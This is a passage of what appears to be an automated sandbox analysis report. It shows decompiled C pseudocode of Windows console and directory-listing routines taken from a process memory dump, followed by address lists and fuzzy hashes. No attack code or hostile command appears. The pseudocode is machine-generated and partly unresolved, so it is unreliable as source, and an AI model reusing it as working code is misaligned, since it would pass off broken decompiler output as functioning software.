						return E002B6FD0(_t195, _t312, _a17612 ^ _t402, _t372, _t395, _t400);
					}
					_t372 = _t372 | 0x80000000;
					 *_t394 = _t372;
				}
				L1:
				if((_t372 & 0x00000040) == 0) {
					__eflags = _t372 & 0x00000004;
					if((_t372 & 0x00000004) == 0) {
						__eflags = _t372 & 0x00000402;
						if(__eflags == 0) {
							_t191 =  *(_t310 + 2) & 0x0000ffff;
							__eflags = _t191;
							if(_t191 == 0) {
								_t192 = 0x2c;
							} else {
								_t192 = 0x2c + _t191 * 2;
							}
							_t311 = E002CA49A(_t399, _t372, _t192 +  &(_t310->Owner), _t317);
							__eflags = _t311;
							if(_t311 == 0) {
								_t373 = 0xe;
								E002C7A11(_t399, _t373);
								_t372 = _t394[0x17];
								_t311 = E002CA3E9(_t399, _t394[0x17],  *_t394, _a4);
							}
							__eflags =  *(_t399 + 8);
							if( *(_t399 + 8) == 0) {
								L4:
								_t195 = _t311;
								goto L5;
							}
							_t195 = E002AB610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L4;
						}
						_t325 = _t399;
						_t372 = _t394[0x17];
						_t311 = E002CA2C1(_t310, _t399, _t394[0x17], __eflags, _t394[0x17], _a4);
						_t200 = 0;
						_a24 = 0;
						__eflags = _t311;
						if(_t311 != 0) {
							L70:
							__eflags =  *(_t399 + 8) - _t200;
							if( *(_t399 + 8) == _t200) {
								L72:
								__eflags =  *_t394 & 0x00100000;
								if(( *_t394 & 0x00100000) == 0) {
									goto L4;
								}
								_t201 = E002B7797(_t325);
								__eflags = _t201;
								if(_t201 == 0) {
									goto L4;
								}
								_a1172 = 1;
								_a1176 = 0x104;
								_a1168 = 0;
								memset( &_a648, 0, 0x104);
								_t402 = _t402 + 0xc;
								__eflags = _a1172;
								_t210 = E002B0C70( &_a648, ((0 | _a1172 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
								__eflags = _t210;
								if(_t210 < 0) {
									L91:
									__imp__??_V@YAXPAX@Z(_a1168);
									goto L4;
								}
								_t329 = _a1168;
								__eflags = _a1168;
								if(_a1168 == 0) {
									_t329 =  &_a648;
								}
								_t372 = _a1176;
								_t214 = E002B51C9(_t329, _a1176,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
								__eflags = _t214;
								if(_t214 == 0) {
									_t215 = _a1168;
									__eflags = _t215;
									if(_t215 == 0) {
										_t215 =  &_a648;
									}
									_t372 = 0;
									_t216 =  *0x2ec00c(_t215, 0,  &_a48, 0);
									_v16 = _t216;
									__eflags = _t216 - 0xffffffff;
									if(_t216 != 0xffffffff) {
										do {
											_t331 =  &_a40;
											_t372 = _t331 + 2;
											do {
												_t217 =  *_t331;
												_t331 = _t331 + 2;
												__eflags = _t217 - _a16;
											} while (_t217 != _a16);
											__eflags = _t331 - _t372 >> 1 - 2;
											if(__eflags < 0) {
												L85:
												_t372 =  *_t394;
												_t219 = E002C9FD6(_t399,  *_t394, __eflags, _v12,  &_a32);
												_t311 = _t219;
												__eflags = _t311;
												if(_t311 != 0) {
													goto L89;
												}
												__eflags =  *(_t399 + 8) - _t219;
												if( *(_t399 + 8) == _t219) {
													goto L89;
												}
												_t223 = E002AB610(_t311, _t399, _t394);
												_a8 = _t223;
												__eflags = _t223;
												if(_t223 == 0) {
													goto L89;
												}
												__imp__??_V@YAXPAX@Z(_a1152);
												_t195 = _a8;
												goto L5;
											}
											__eflags = _a42 - 0x3a;
											if(__eflags == 0) {
												goto L89;
											}
											goto L85;
											L89:
											_t221 =  *0x2ec038(_v16,  &_a32);
											__eflags = _t221;
										} while (_t221 != 0);
										FindClose(_v24);
									}
								}
								goto L91;
							}
							_t325 = _t399;
							_t195 = E002AB610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L72;
						}
						__eflags =  *_t394 & 0x00000400;
						if(( *_t394 & 0x00000400) == 0) {
							_t374 =  *0x2cd190; // 0x13
							_t375 = _t374 + 0x13;
							__eflags = _t374 + 0x13;
						} else {
							_t315 = _v0;
							__eflags =  *(_t315 + 2);
							if( *(_t315 + 2) != 0) {
								_t389 =  *0x2cd190; // 0x13
								_t364 = _t399;
								E002C7A11(_t364, _t389 + 0x13);
								_push(_t364);
								E002B6740(_t399,  *_t394, _t315 + 0x30 + ( *(_t315 + 2) & 0x0000ffff) * 2);
							}
							_t388 =  *0x2cd190; // 0x13
							_t375 = _t388 + 0x20;
						}
						_t337 = _t399;
						E002C7A11(_t337, _t375);
						_t372 =  *_t394;
						_t313 = L"...";
						_a8 = _t313;
						__eflags = _t372 & 0x00040000;
						if((_t372 & 0x00040000) == 0) {
							L42:
							_push(_t337);
							_t325 = _t399;
							_a16 = _a4 + 0x2c;
							_t311 = E002B6740(_t399, _t372, _a4 + 0x2c);
							_t228 = _v4;
							__eflags =  *_t228 & 0x00000400;
							if(( *_t228 & 0x00000400) == 0) {
								L69:
								_t200 = 0;
								__eflags = 0;
								goto L70;
							}
							__eflags = _t228[9] & 0x20000000;
							if((_t228[9] & 0x20000000) == 0) {
								goto L69;
							}
							_a568 = 1;
							_a572 = 0x104;
							_a564 = 0;
							memset( &_a44, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a568;
							_t237 = E002B0C70( &_a44, ((0 | _a568 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t237;
							if(_t237 < 0) {
								L67:
								_t372 = L"%s";
								E002B6B76(_t399, L"%s", L" [.]");
								L68:
								__imp__??_V@YAXPAX@Z(_a564);
								_pop(_t325);
								goto L69;
							}
							_t341 = _a564;
							__eflags = _a564;
							if(_a564 == 0) {
								_t341 =  &_a44;
							}
							_t240 = E002B51C9(_t341, _a572,  *((intOrPtr*)(_a8 + 4)), _a12);
							__eflags = _t240;
							if(_t240 != 0) {
								goto L67;
							} else {
								_t241 = _a564;
								__eflags = _t241;
								if(_t241 == 0) {
									_t241 =  &_a44;
								}
								_t242 = CreateFileW(_t241, 8, 7, 0, 3, 0x2200000, 0);
								_a12 = _t242;
								__eflags = _t242 - 0xffffffff;
								if(_t242 != 0xffffffff) {
									_t243 = DeviceIoControl(_t242, 0x900a8, 0, 0,  &_a1212, 0x4002,  &_a32, 0);
									_t372 = L"%s";
									_t345 = _t399;
									__eflags = _t243;
									if(_t243 != 0) {
										E002B6B76(_t345, L"%s", L" [");
										__eflags = _a1208 - 0xa0000003;
										if(_a1208 != 0xa0000003) {
											__eflags = _a1212 - 0xa000000c;
											if(_a1212 != 0xa000000c) {
												_t396 = 6;
												L63:
												_t133 = _t396 + 2; // 0x8
												_t245 = E002B00B0(_t133);
												_v4 = _t245;
												__eflags = _t245;
												if(_t245 != 0) {
													memcpy(_t245, _a4, _t396);
													_t402 = _t402 + 0xc;
													__eflags = 0;
													 *((short*)(_v4 + (_t396 >> 1) * 2)) = 0;
													E002B6B76(_t399, L"%s", _v4);
													E002B0040(_v8);
												}
												_t372 = L"%s";
												E002B6B76(_t399, L"%s", "]");
												_t394 = _a16;
												goto L66;
											}
											_t396 = _a1226 & 0x0000ffff;
											_a4 = _t402 + 0x4e4 + ((_a1224 & 0x0000ffff) >> 1) * 2;
											__eflags = _t396;
											if(_t396 != 0) {
												goto L63;
											}
											_t256 = (_a1220 & 0x0000ffff) >> 1;
											__eflags = _t256;
											_t257 = _t402 + 0x4e4 + _t256 * 2;
											L61:
											_t396 = _a1222 & 0x0000ffff;
											_a4 = _t257;
											goto L63;
										}
										_t396 = _a1226 & 0x0000ffff;
										_a4 = _t402 + 0x4e0 + ((_a1224 & 0x0000ffff) >> 1) * 2;
										__eflags = _t396;
										if(_t396 != 0) {
											goto L63;
										}
										_t257 = _t402 + 0x4e0 + ((_a1220 & 0x0000ffff) >> 1) * 2;
										goto L61;
									}
									_push(L" [...]");
									goto L54;
								} else {
									_push(L" [..]");
									_t372 = L"%s";
									_t345 = _t399;
									L54:
									E002B6B76(_t345, _t372);
									L66:
									CloseHandle(_a12);
									goto L68;
								}
							}
						} else {
							_a16 = 0x101;
							_a20 = 0;
							_a568 = 0;
							_a28 = 0x10;
							_a572 = 1;
							_a576 = 0x104;
							memset( &_a48, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a572;
							_t272 = E002B0C70( &_a48, ((0 | _a572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t272;
							if(_t272 >= 0) {
								_t273 = E002B00B0(0x10000);
								_v0 = _t273;
								__eflags = _t273;
								if(_t273 != 0) {
									_t354 = _a568;
									__eflags = _a568;
									if(_a568 == 0) {
										_t354 =  &_a48;
									}
									_t277 = E002B51C9(_t354, _a576,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
									__eflags = _t277;
									if(_t277 != 0) {
										L33:
										E002B6B76(_t399, L"%s", _t313);
										goto L36;
									} else {
										_t281 = _a568;
										__eflags = _t281;
										if(_t281 == 0) {
											_t281 =  &_a48;
										}
										_t282 = GetFileSecurityW(_t281, 1, _v0, 0x10000,  &_a40);
										__eflags = _t282;
										if(_t282 == 0) {
											goto L33;
										} else {
											_t285 = GetSecurityDescriptorOwner(_v0,  &_a20,  &_a44);
											__eflags = _t285;
											if(_t285 == 0) {
												goto L33;
											}
											_t286 = E002B7797( &_a40);
											__eflags = _t286;
											if(_t286 == 0) {
												L34:
												_push(_t313);
												_t383 = L"%s";
												L35:
												E002B6B76(_t399, _t383);
												__eflags = 0;
												_a16 = 0;
												L36:
												E002B0040(_v0);
												L37:
												__eflags =  *_t394 & 0x00000400;
												_t381 =  *0x2cd190; // 0x13
												if(( *_t394 & 0x00000400) == 0) {
													_t382 = _t381 + 0x2a;
													__eflags = _t381 + 0x2a;
												} else {
													_t382 = _t381 + 0x37;
												}
												E002C7A11(_t399, _t382);
												L41:
												__imp__??_V@YAXPAX@Z(_a568);
												_t372 =  *_t394;
												_pop(_t337);
												goto L42;
											}
											 *0x2ec034(0, _a20,  &_a648,  &_a16,  &_a1184,  &_a28,  &_a36);
											__eflags = 0;
											if(0 == 0) {
												goto L34;
											}
											_t314 = L"%s";
											E002B6B76(_t399, _t314,  &_a1156);
											E002B6B76(_t399, _t314, "\\");
											_t383 = _t314;
											_push( &_a612);
											goto L35;
										}
									}
								}
								E002B6B76(_t399, L"%s", _t313);
								goto L37;
							}
							E002B6B76(_t399, L"%s", _t313);
							goto L41;
						}
					}
					_t306 = E002CAB79(_t399, _t372, _a4);
					L3:
					_t311 = _t306;
					goto L4;
				}
				_t306 = E002B660F(_t399, _t372,  *((intOrPtr*)(_a12 + 4)), _a4);
				goto L3;
			}






































































                                              0x002b6555
                                              0x002b655d
                                              0x002b6562
                                              0x002b6569
                                              0x002b6570
                                              0x002b6574
                                              0x002b6578
                                              0x002b657c
                                              0x002b657f
                                              0x002b6585
                                              0x002b6589
                                              0x002b658c
                                              0x002b658f
                                              0x002b6593
                                              0x002b6596
                                              0x002b6598
                                              0x002b659a
                                              0x002b659e
                                              0x002b65a4
                                              0x002bf9ae
                                              0x002bf9b0
                                              0x00000000
                                              0x00000000
                                              0x002bf9bf
                                              0x002bf9c1
                                              0x002bf9c8
                                              0x002bf9cb
                                              0x002bf9cd
                                              0x002bf9cf
                                              0x002b65ca
                                              0x002b65d1
                                              0x002b65d2
                                              0x002b65d3
                                              0x002b65de
                                              0x002b65de
                                              0x002bf9d5
                                              0x002bf9db
                                              0x002bf9db
                                              0x002b65aa
                                              0x002b65ad
                                              0x002bf9e2
                                              0x002bf9e5
                                              0x002bf9f8
                                              0x002bf9fe
                                              0x002c0030
                                              0x002c0034
                                              0x002c0037
                                              0x002c0044
                                              0x002c0039
                                              0x002c0039
                                              0x002c0039
                                              0x002c0053
                                              0x002c0055
                                              0x002c0057
                                              0x002c005b
                                              0x002c005e
                                              0x002c0067
                                              0x002c0073
                                              0x002c0073
                                              0x002c0075
                                              0x002c0079
                                              0x002b65c8
                                              0x002b65c8
                                              0x00000000
                                              0x002b65c8
                                              0x002c0081
                                              0x002c0086
                                              0x002c0088
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c008e
                                              0x002bfa08
                                              0x002bfa0b
                                              0x002bfa13
                                              0x002bfa15
                                              0x002bfa17
                                              0x002bfa1b
                                              0x002bfa1d
                                              0x002bfeac
                                              0x002bfeac
                                              0x002bfeaf
                                              0x002bfec0
                                              0x002bfec0
                                              0x002bfec6
                                              0x00000000
                                              0x00000000
                                              0x002bfecc
                                              0x002bfed1
                                              0x002bfed3
                                              0x00000000
                                              0x00000000
                                              0x002bfede
                                              0x002bfee8
                                              0x002bfef1
                                              0x002bff00
                                              0x002bff0e
                                              0x002bff11
                                              0x002bff27
                                              0x002bff2c
                                              0x002bff2e
                                              0x002c001d
                                              0x002c0024
                                              0x00000000
                                              0x002c002a
                                              0x002bff34
                                              0x002bff3b
                                              0x002bff3d
                                              0x002bff3f
                                              0x002bff3f
                                              0x002bff4a
                                              0x002bff5c
                                              0x002bff61
                                              0x002bff63
                                              0x002bff69
                                              0x002bff70
                                              0x002bff72
                                              0x002bff74
                                              0x002bff74
                                              0x002bff7b
                                              0x002bff85
                                              0x002bff8b
                                              0x002bff8f
                                              0x002bff92
                                              0x002bff98
                                              0x002bff98
                                              0x002bff9c
                                              0x002bff9f
                                              0x002bff9f
                                              0x002bffa2
                                              0x002bffa5
                                              0x002bffa5
                                              0x002bffb0
                                              0x002bffb3
                                              0x002bffbd
                                              0x002bffbd
                                              0x002bffca
                                              0x002bffcf
                                              0x002bffd1
                                              0x002bffd3
                                              0x00000000
                                              0x00000000
                                              0x002bffd5
                                              0x002bffd8
                                              0x00000000
                                              0x00000000
                                              0x002bffdc
                                              0x002bffe1
                                              0x002bffe5
                                              0x002bffe7
                                              0x00000000
                                              0x00000000
                                              0x002bfff0
                                              0x002bfff6
                                              0x00000000
                                              0x002bfffa
                                              0x002bffb5
                                              0x002bffbb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c0000
                                              0x002c0009
                                              0x002c000f
                                              0x002c000f
                                              0x002c0017
                                              0x002c0017
                                              0x002bff92
                                              0x00000000
                                              0x002bff63
                                              0x002bfeb1
                                              0x002bfeb3
                                              0x002bfeb8
                                              0x002bfeba
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bfeba
                                              0x002bfa23
                                              0x002bfa29
                                              0x002bfa65
                                              0x002bfa6b
                                              0x002bfa6b
                                              0x002bfa2b
                                              0x002bfa2b
                                              0x002bfa2f
                                              0x002bfa33
                                              0x002bfa35
                                              0x002bfa3b
                                              0x002bfa40
                                              0x002bfa4b
                                              0x002bfa55
                                              0x002bfa55
                                              0x002bfa5a
                                              0x002bfa60
                                              0x002bfa60
                                              0x002bfa6e
                                              0x002bfa70
                                              0x002bfa75
                                              0x002bfa77
                                              0x002bfa7c
                                              0x002bfa80
                                              0x002bfa86
                                              0x002bfc60
                                              0x002bfc67
                                              0x002bfc69
                                              0x002bfc6b
                                              0x002bfc74
                                              0x002bfc76
                                              0x002bfc7a
                                              0x002bfc80
                                              0x002bfeaa
                                              0x002bfeaa
                                              0x002bfeaa
                                              0x00000000
                                              0x002bfeaa
                                              0x002bfc86
                                              0x002bfc8d
                                              0x00000000
                                              0x00000000
                                              0x002bfc98
                                              0x002bfca2
                                              0x002bfcab
                                              0x002bfcb7
                                              0x002bfcc2
                                              0x002bfcc5
                                              0x002bfcdb
                                              0x002bfce0
                                              0x002bfce2
                                              0x002bfe8b
                                              0x002bfe90
                                              0x002bfe97
                                              0x002bfe9c
                                              0x002bfea3
                                              0x002bfea9
                                              0x00000000
                                              0x002bfea9
                                              0x002bfce8
                                              0x002bfcef
                                              0x002bfcf1
                                              0x002bfcf3
                                              0x002bfcf3
                                              0x002bfd09
                                              0x002bfd0e
                                              0x002bfd10
                                              0x00000000
                                              0x002bfd16
                                              0x002bfd16
                                              0x002bfd1d
                                              0x002bfd1f
                                              0x002bfd21
                                              0x002bfd21
                                              0x002bfd35
                                              0x002bfd3b
                                              0x002bfd3f
                                              0x002bfd42
                                              0x002bfd6f
                                              0x002bfd75
                                              0x002bfd7a
                                              0x002bfd7c
                                              0x002bfd7e
                                              0x002bfd94
                                              0x002bfd99
                                              0x002bfda4
                                              0x002bfdda
                                              0x002bfde5
                                              0x002bfe29
                                              0x002bfe2a
                                              0x002bfe2a
                                              0x002bfe2d
                                              0x002bfe32
                                              0x002bfe36
                                              0x002bfe38
                                              0x002bfe40
                                              0x002bfe49
                                              0x002bfe4e
                                              0x002bfe56
                                              0x002bfe5c
                                              0x002bfe65
                                              0x002bfe65
                                              0x002bfe6f
                                              0x002bfe76
                                              0x002bfe7b
                                              0x00000000
                                              0x002bfe7b
                                              0x002bfdef
                                              0x002bfe00
                                              0x002bfe04
                                              0x002bfe06
                                              0x00000000
                                              0x00000000
                                              0x002bfe10
                                              0x002bfe10
                                              0x002bfe12
                                              0x002bfe19
                                              0x002bfe19
                                              0x002bfe21
                                              0x00000000
                                              0x002bfe21
                                              0x002bfdae
                                              0x002bfdbf
                                              0x002bfdc3
                                              0x002bfdc5
                                              0x00000000
                                              0x00000000
                                              0x002bfdd1
                                              0x00000000
                                              0x002bfdd1
                                              0x002bfd80
                                              0x00000000
                                              0x002bfd44
                                              0x002bfd44
                                              0x002bfd49
                                              0x002bfd4e
                                              0x002bfd85
                                              0x002bfd85
                                              0x002bfe7f
                                              0x002bfe83
                                              0x00000000
                                              0x002bfe83
                                              0x002bfd42
                                              0x002bfa8c
                                              0x002bfa8e
                                              0x002bfa9b
                                              0x002bfaa1
                                              0x002bfaad
                                              0x002bfab5
                                              0x002bfabd
                                              0x002bfac4
                                              0x002bfacf
                                              0x002bfad2
                                              0x002bfae8
                                              0x002bfaed
                                              0x002bfaef
                                              0x002bfb08
                                              0x002bfb0d
                                              0x002bfb11
                                              0x002bfb13
                                              0x002bfb27
                                              0x002bfb2e
                                              0x002bfb30
                                              0x002bfb32
                                              0x002bfb32
                                              0x002bfb4c
                                              0x002bfb51
                                              0x002bfb53
                                              0x002bfc08
                                              0x002bfc10
                                              0x00000000
                                              0x002bfb59
                                              0x002bfb59
                                              0x002bfb60
                                              0x002bfb62
                                              0x002bfb64
                                              0x002bfb64
                                              0x002bfb79
                                              0x002bfb7f
                                              0x002bfb81
                                              0x00000000
                                              0x002bfb87
                                              0x002bfb95
                                              0x002bfb9b
                                              0x002bfb9d
                                              0x00000000
                                              0x00000000
                                              0x002bfb9f
                                              0x002bfba4
                                              0x002bfba6
                                              0x002bfc17
                                              0x002bfc17
                                              0x002bfc18
                                              0x002bfc1d
                                              0x002bfc1f
                                              0x002bfc24
                                              0x002bfc26
                                              0x002bfc2a
                                              0x002bfc2e
                                              0x002bfc33
                                              0x002bfc33
                                              0x002bfc39
                                              0x002bfc3f
                                              0x002bfc46
                                              0x002bfc46
                                              0x002bfc41
                                              0x002bfc41
                                              0x002bfc41
                                              0x002bfc4b
                                              0x002bfc50
                                              0x002bfc57
                                              0x002bfc5d
                                              0x002bfc5f
                                              0x00000000
                                              0x002bfc5f
                                              0x002bfbce
                                              0x002bfbd4
                                              0x002bfbd6
                                              0x00000000
                                              0x00000000
                                              0x002bfbdf
                                              0x002bfbe9
                                              0x002bfbf7
                                              0x002bfc03
                                              0x002bfc05
                                              0x00000000
                                              0x002bfc05
                                              0x002bfb81
                                              0x002bfb53
                                              0x002bfb1d
                                              0x00000000
                                              0x002bfb1d
                                              0x002bfaf9
                                              0x00000000
                                              0x002bfaf9
                                              0x002bfa86
                                              0x002bf9ee
                                              0x002b65c6
                                              0x002b65c6
                                              0x00000000
                                              0x002b65c6
                                              0x002b65c1
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID:
                                              • String ID: [...]$ [..]$ [.]$...$:
                                              • API String ID: 0-1980097535
                                              • Opcode ID: bc415eccf68e5d3d9cbbed3bf0fbd923fe63486625c306a50235bcb924493a21
                                              • Instruction ID: 543d5ca15fc1b72a3718d8e6402076c2974e640536a98ed910f63f0db41a12bd
                                              • Opcode Fuzzy Hash: bc415eccf68e5d3d9cbbed3bf0fbd923fe63486625c306a50235bcb924493a21
                                              • Instruction Fuzzy Hash: 4612DF702243429BD764DF24CD89BAFB7E5EF88384F00492DF98997291EB34D864CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AC5CA, Relevance: 30.2, APIs: 20, Instructions: 238COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 68%
                                              			E002AC5CA(void* __ecx, long __edx, void* _a4, signed int _a8) {
				signed int _v8;
				short _v16;
				short _v20;
				signed int _v26;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				signed int _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				long _v60;
				signed int _v64;
				void* _v68;
				long _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				char _v88;
				void* _v108;
				long _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t66;
				long _t68;
				long _t71;
				char* _t81;
				long _t85;
				intOrPtr _t88;
				signed int _t91;
				long _t93;
				long _t95;
				signed short _t100;
				struct _COORD _t105;
				void* _t114;
				void* _t115;
				long _t119;
				long _t122;
				signed int _t125;
				long _t128;
				void* _t138;
				void* _t141;
				void* _t143;
				signed int _t150;

				_t63 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t63 ^ _t150;
				_v64 = _a8;
				_t141 = __ecx;
				_v76 = __edx;
				_t137 = 0;
				_v72 = 0;
				_t66 = E002B269C(_a8);
				if(_t66 == 0) {
					L13:
					_t114 = 0;
				} else {
					__imp___get_osfhandle(__edx);
					_t114 = _t66;
					if(GetConsoleScreenBufferInfo(_t114,  &_v32) == 0) {
						goto L13;
					} else {
						_t137 = _v16 - _v20 - 1;
						_v72 = _t137;
					}
				}
				_v60 = _v60 & 0x00000000;
				_t119 = E002AC6F4(_t141, _a4, _v64);
				_t133 = 0x2db980;
				_v64 = _t119;
				_t142 = _t119;
				_v68 = 0x2db980;
				if(_t119 == 0) {
					_t68 = _v60;
					goto L11;
				} else {
					do {
						if(_t114 == 0) {
							_t119 = _v76;
							_t85 = E002B27C8(_t142 + _t142, _t133, _t142 + _t142,  &_v88);
							__eflags = _t85;
							if(_t85 == 0) {
								L16:
								_t68 = GetLastError();
								_v60 = _t68;
								break;
							} else {
								__eflags = _v88 - _t142 + _t142;
								if(_v88 == _t142 + _t142) {
									goto L9;
								} else {
									goto L16;
								}
							}
						} else {
							if( *0x2e8065 != 0) {
								_t128 =  *0x2e851c;
								__eflags = _t128 - _t137;
								if(_t128 < _t137) {
									L33:
									_t143 = _t133;
									_t88 = _t133 + _v64 * 2;
									_v84 = _t88;
									__eflags = _t133 - _t88;
									if(_t133 < _t88) {
										while(1) {
											__eflags = _t128 - _t137;
											if(_t128 >= _t137) {
												break;
											}
											_t91 =  *_t143 & 0x0000ffff;
											_t143 = _t143 + 2;
											__eflags = _t91 - 0xa;
											if(_t91 == 0xa) {
												_t128 = _t128 + 1;
												__eflags = _t128;
											}
											__eflags = _t143 - _v84;
											if(_t143 < _v84) {
												continue;
											}
											break;
										}
										 *0x2e851c = _t128;
									}
									_t142 = _t143 - _t133 >> 1;
									goto L8;
								} else {
									 *0x2e851c = 0;
									_t93 = GetConsoleScreenBufferInfo(_t114,  &_v32);
									__eflags = _t93;
									if(_t93 == 0) {
										L32:
										_t128 =  *0x2e851c;
										_t133 = _v68;
										goto L33;
									} else {
										_t95 = WriteConsoleW(_t114,  *0x2e8518,  *0x2e8514,  &_v60, 0);
										__eflags = _t95;
										if(_t95 == 0) {
											goto L32;
										} else {
											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
											GetConsoleMode(_t114,  &_v80);
											_t100 = SetConsoleMode(_t114, 0);
											__imp___getch();
											_t137 = _t100 & 0x0000ffff;
											SetConsoleMode(_t114, _v80);
											GetConsoleScreenBufferInfo(_t114,  &_v56);
											_t133 = _v32.dwSize * _v26;
											_push( &_v60);
											_t105 = _v32.dwCursorPosition;
											_push(_t105);
											_t142 = _v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition;
											_push(_v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition);
											_push(0x20);
											_push(_t114);
											FillConsoleOutputCharacterW();
											SetConsoleCursorPosition(_t114, _v32.dwCursorPosition);
											__eflags = (_t100 & 0x0000ffff) - 3;
											if((_t100 & 0x0000ffff) == 3) {
												EnterCriticalSection( *0x2d3858);
												 *0x2cd544 = 1;
												LeaveCriticalSection( *0x2d3858);
												_t68 = 0;
												L12:
												return E002B6FD0(_t68, _t114, _v8 ^ _t150, _t133, _t137, _t142);
											} else {
												_t137 = _v72;
												goto L32;
											}
										}
									}
								}
							} else {
								_t142 = 0xa0;
								if(_t119 <= 0xa0) {
									_t142 = _t119;
								}
								L8:
								if(WriteConsoleW(_t114, _t133, _t142,  &_v60, 0) == 0) {
									_t68 = GetLastError();
								} else {
									L9:
									_t68 = 0;
								}
								goto L10;
							}
						}
						goto L55;
						L10:
						_t119 = _v64 - _t142;
						_v60 = _t68;
						_v64 = _t119;
						_t133 = _v68 + _t142 * 2;
						_v68 = _t133;
					} while (_t119 != 0);
					L11:
					if(_t68 != 0) {
						__eflags = _v76 - 2;
						if(__eflags != 0) {
							goto L12;
						} else {
							do {
								__eflags = E002B4B60(__eflags, 0);
							} while (__eflags == 0);
							exit(1);
							asm("int3");
							while(1) {
								L44:
								__eflags = _t133 - _t114;
								if(_t133 == _t114) {
									_t119 = _t119 + 2;
								}
								while(1) {
									_t134 = _t114;
									_t71 = E002AD7D4(_t119, _t114);
									_t122 = _t71;
									__eflags = _t122;
									if(_t122 == 0) {
										break;
									}
									_t119 = _t122 + 2;
									_t133 =  *_t119 & 0x0000ffff;
									__eflags = _t133 - 0x31 - 8;
									if(_t133 - 0x31 > 8) {
										goto L44;
									} else {
										_t142 = _t142 + 1;
										continue;
									}
									L24:
									__eflags = _v8 ^ _t150;
									return E002B6FD0(_t76, _t115, _v8 ^ _t150, _t134, _t137, _t142);
									goto L55;
								}
								_t115 = _v108;
								__eflags = _t142 - _a4;
								if(_t142 > _a4) {
									_t115 = HeapAlloc(GetProcessHeap(), 0, _t142 << 2);
									__eflags = _t115;
									if(_t115 != 0) {
										_t125 = 0;
										__eflags = _t142;
										if(_t142 != 0) {
											_t138 = _v108;
											_t134 = _a4;
											do {
												__eflags = _t125 - _t134;
												if(_t125 >= _t134) {
													_t81 = " ";
												} else {
													 *_t138 =  *_t138 + 4;
													_t81 =  *( *_t138 - 4);
												}
												 *(_t115 + _t125 * 4) = _t81;
												_t125 = _t125 + 1;
												__eflags = _t125 - _t142;
											} while (_t125 < _t142);
											_t137 = _v112;
										}
										_t142 = FormatMessageW(0x3800, 0, _t137, 0, 0x2db980, 0x2000, _t115);
										RtlFreeHeap(GetProcessHeap(), 0, _t115);
										goto L23;
									}
								} else {
									_push(_t115);
									_push(0x2000);
									_push(0x2db980);
									_push(_t71);
									_push(_t137);
									_push(_t71);
									_push(0x1800);
									_t142 = FormatMessageW();
									L23:
									_t76 = _t142;
								}
								goto L24;
							}
						}
					} else {
						goto L12;
					}
				}
				L55:
			}













































                                              0x002ac5d2
                                              0x002ac5d9
                                              0x002ac5e3
                                              0x002ac5e7
                                              0x002ac5e9
                                              0x002ac5ec
                                              0x002ac5f0
                                              0x002ac5f3
                                              0x002ac5fa
                                              0x002ac6b9
                                              0x002ac6b9
                                              0x002ac600
                                              0x002ac601
                                              0x002ac607
                                              0x002ac617
                                              0x00000000
                                              0x002ac61d
                                              0x002ac627
                                              0x002ac628
                                              0x002ac628
                                              0x002ac617
                                              0x002ac62e
                                              0x002ac63c
                                              0x002ac63e
                                              0x002ac643
                                              0x002ac646
                                              0x002ac648
                                              0x002ac64d
                                              0x002ac6ef
                                              0x00000000
                                              0x002ac653
                                              0x002ac653
                                              0x002ac655
                                              0x002ac6c4
                                              0x002ac6cb
                                              0x002ac6d0
                                              0x002ac6d2
                                              0x002ac6dc
                                              0x002ac6dc
                                              0x002ac6e2
                                              0x00000000
                                              0x002ac6d4
                                              0x002ac6d7
                                              0x002ac6da
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002ac6da
                                              0x002ac657
                                              0x002ac65e
                                              0x002bad2a
                                              0x002bad30
                                              0x002bad32
                                              0x002bae01
                                              0x002bae04
                                              0x002bae06
                                              0x002bae09
                                              0x002bae0c
                                              0x002bae0e
                                              0x002bae10
                                              0x002bae10
                                              0x002bae12
                                              0x00000000
                                              0x00000000
                                              0x002bae14
                                              0x002bae17
                                              0x002bae1a
                                              0x002bae1d
                                              0x002bae1f
                                              0x002bae1f
                                              0x002bae1f
                                              0x002bae20
                                              0x002bae23
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bae23
                                              0x002bae25
                                              0x002bae25
                                              0x002bae2d
                                              0x00000000
                                              0x002bad38
                                              0x002bad3f
                                              0x002bad45
                                              0x002bad4b
                                              0x002bad4d
                                              0x002badf8
                                              0x002badf8
                                              0x002badfe
                                              0x00000000
                                              0x002bad53
                                              0x002bad65
                                              0x002bad6b
                                              0x002bad6d
                                              0x00000000
                                              0x002bad73
                                              0x002bad7c
                                              0x002bad87
                                              0x002bad8f
                                              0x002bad95
                                              0x002bad9e
                                              0x002bada2
                                              0x002badad
